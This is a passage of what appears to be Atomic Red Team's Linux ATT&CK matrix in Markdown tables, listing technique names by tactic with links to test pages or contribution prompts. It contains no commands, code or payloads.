| | | Implant Internal Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Setuid and Setgid](../../T1548.001/T1548.001.md) | Downgrade System Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Pluggable Authentication Modules](../../T1556.003/T1556.003.md) | Software Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Network Device Configuration Dump [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Multiband Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Shutdown/Reboot](../../T1529/T1529.md) |
| | | [Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | [Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | [Dynamic Linker Hijacking](../../T1574.006/T1574.006.md) | [Private Keys](../../T1552.004/T1552.004.md) | [System Checks](../../T1497.001/T1497.001.md) | | Remote Data Staging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Non-Application Layer Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| | | [Local Account](../../T1136.001/T1136.001.md) | [Systemd Service](../../T1543.002/T1543.002.md) | Email Hiding Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Proc Filesystem](../../T1003.007/T1003.007.md) | [System Information Discovery](../../T1082/T1082.md) | | Remote Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Non-Standard Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | Local Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Systemd Timers](../../T1053.006/T1053.006.md) | Environmental Keying [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [SAML Tokens](../../T1606.002/T1606.002.md) | System Language Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | SNMP (MIB Dump) [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Non-Standard Port](../../T1571/T1571.md) | |
| | | Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Trap](../../T1546.005/T1546.005.md) | Execution Guardrails [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Securityd Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | System Location Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Screen Capture](../../T1113/T1113.md) | | One-Way Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | Network Device Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unix Shell Configuration Modification](../../T1546.004/T1546.004.md) | Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Steal Application Access Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Network Configuration Discovery](../../T1016/T1016.md) | | Sharepoint [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | Office Application Startup [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | VDSO Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [File Deletion](../../T1070.004/T1070.004.md) | Steal Web Session Cookie [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Network Connections Discovery](../../T1049/T1049.md) | | Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Protocol Impersonation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | Office Template Macros [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | File and Directory Permissions Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Owner/User Discovery](../../T1033/T1033.md) | | | | Protocol Tunneling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | Office Test [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | XDG Autostart Entries [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | HTML Smuggling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Two-Factor Authentication Interception [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | Outlook Forms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Hidden File System [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Unsecured Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | Remote Access Software [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | Outlook Home Page [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Hidden Files and Directories](../../T1564.001/T1564.001.md) | Web Cookies [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | [Standard Encoding](../../T1132.001/T1132.001.md) | |
| | | Outlook Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Hide Artifacts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | Steganography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | [Pluggable Authentication Modules](../../T1556.003/T1556.003.md) | | Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | Symmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Impair Command History Logging](../../T1562.003/T1562.003.md) | | | | | | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | Pre-OS Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Impair Defenses [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | [Web Protocols](../../T1071.001/T1071.001.md) | |
| | | [RC Scripts](../../T1037.004/T1037.004.md) | | [Indicator Blocking](../../T1562.006/T1562.006.md) | | | | | | Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | ROMMONkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Indicator Removal from Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Redundant Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Indicator Removal on Host [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | SQL Stored Procedures [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Install Root Certificate](../../T1553.004/T1553.004.md) | | | | | | | |
| | | [SSH Authorized Keys](../../T1098.004/T1098.004.md) | | [Linux and Mac File and Directory Permissions Modification](../../T1222.002/T1222.002.md) | | | | | | | |
| | | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Local Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Server Software Component [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Masquerade Task or Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [Systemd Service](../../T1543.002/T1543.002.md) | | Masquerading [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [Systemd Timers](../../T1053.006/T1053.006.md) | | [Match Legitimate Name or Location](../../T1036.005/T1036.005.md) | | | | | | | |
| | | TFTP Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Modify Cloud Compute Infrastructure [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Transport Agent [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Modify System Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [Trap](../../T1546.005/T1546.005.md) | | Network Address Translation Traversal [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [Unix Shell Configuration Modification](../../T1546.004/T1546.004.md) | | Network Boundary Bridging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Network Device Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Web Shell [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Obfuscated Files or Information](../../T1027/T1027.md) | | | | | | | |
| | | XDG Autostart Entries [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Patch System Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | [Pluggable Authentication Modules](../../T1556.003/T1556.003.md) | | | | | | | |
| | | | | Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Pre-OS Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Proc Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Process Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Ptrace System Calls [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | ROMMONkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Reduce Key Space [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Redundant Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Reflective Code Loading [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Linux)](../../T1053.001/T1053.001.md) | [.bash_profile and .bashrc](../../T1546.004/T1546.004.md) | [.bash_profile and .bashrc](../../T1546.004/T1546.004.md) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | /etc/passwd and /etc/shadow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Account Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive Collected Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Automated Exfiltration [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Account Access Removal [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Account Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Bash History](../../T1552.003/T1552.003.md) | [Browser Bookmark Discovery](../../T1217/T1217.md) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive via Custom Method [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Transfer Size Limits](../../T1030/T1030.md) | Asymmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | Add Office 365 Global Administrator Role [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Linux)](../../T1053.001/T1053.001.md) | [Binary Padding](../../T1027.001/T1027.001.md) | Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Internal Spearphishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive via Library [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Alternative Protocol](../../T1048/T1048.md) | Bidirectional Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Compromise Software Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Add-ins [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Instance Metadata API [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Groups [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive via Utility](../../T1560.001/T1560.001.md) | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Destruction](../../T1485/T1485.md) |
| Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Additional Azure Service Principal Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Command History](../../T1070.003/T1070.003.md) | Credential Stuffing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Service Dashboard [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Audio Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encrypted for Impact [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | JavaScript/JScript [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Linux)](../../T1053.001/T1053.001.md) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Linux or Mac System Logs](../../T1070.002/T1070.002.md) | [Credentials In Files](../../T1552.001/T1552.001.md) | Cloud Service Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Automated Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Malicious File [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Credentials from Password Stores [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | SSH [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Clipboard Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS Calculation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Malicious Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Compile After Delivery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Credentials from Web Browsers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Groups [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | SSH Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Confluence [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Direct Network Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| External Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Native API [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Extensions](../../T1176/T1176.md) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Cloud Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Email Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Staged [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Obfuscation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Python [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Snapshot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [File and Directory Discovery](../../T1083/T1083.md) | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Cloud Storage Object [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Dead Drop Resolver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Keylogging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Account](../../T1087.001/T1087.001.md) | VNC [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Fronting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Phishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scripting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Compromise Client Software Binary [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Delete Cloud Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Groups](../../T1069.001/T1069.001.md) | Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Local System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration over USB [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Spearphishing Attachment [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | Deobfuscate/Decode Files or Information [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Service Scanning](../../T1046/T1046.md) | | Data from Network Shared Drive [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dynamic Resolution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Spearphishing Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Source [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [LD_PRELOAD](../../T1574.006/T1574.006.md) | Disable or Modify Cloud Firewall [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Sniffing](../../T1040/T1040.md) | [Network Share Discovery](../../T1135/T1135.md) | | Data from Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Encrypted Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Firmware Corruption [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Spearphishing via Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Unix Shell](../../T1059.004/T1059.004.md) | [Cron](../../T1053.003/T1053.003.md) | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disable or Modify System Firewall](../../T1562.004/T1562.004.md) | OS Credential Dumping [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Sniffing](../../T1040/T1040.md) | | Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Inhibit System Recovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Supply Chain Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | User Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Proc Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disable or Modify Tools](../../T1562.001/T1562.001.md) | Password Cracking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Policy Discovery](../../T1201/T1201.md) | | Email Forwarding Rule [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Transfer Data to Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Fallback Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Internal Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Trusted Relationship [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Visual Basic [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Process Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Password Guessing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Permission Groups Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Fast Flux DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Ptrace System Calls [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Environmental Keying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Password Spraying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Process Discovery](../../T1057/T1057.md) | | Keylogging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | File Transfer Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | | Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Remote System Discovery](../../T1018/T1018.md) | | [Local Data Staging](../../T1074.001/T1074.001.md) | | [Ingress Tool Transfer](../../T1105/T1105.md) | Reflection Amplification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
| | | Exchange Email Delegate Permissions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Setuid and Setgid](../../T1548.001/T1548.001.md) | Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Private Keys](../../T1552.004/T1552.004.md) | [Security Software Discovery](../../T1518.001/T1518.001.md) | | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Internal Proxy](../../T1090.001/T1090.001.md) | [Resource Hijacking](../../T1496/T1496.md) |
